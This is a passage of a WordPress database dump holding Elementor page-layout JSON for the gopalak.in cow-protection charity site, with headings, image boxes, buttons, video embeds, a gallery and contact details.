":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10048,1681,'_elementor_page_assets','a:0:{}'),(10050,1682,'_elementor_edit_mode','builder'),(10051,1682,'_elementor_template_type','wp-page'),(10052,1682,'_elementor_version','3.7.8'),(10053,1682,'_wp_page_template','elementor_canvas'),(10054,1682,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1654,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\"},{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1628,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-1234.png\"}],\"background_repeat\":\"no-repeat\",\"background_slideshow_slide_duration\":2000,\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0300\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":fals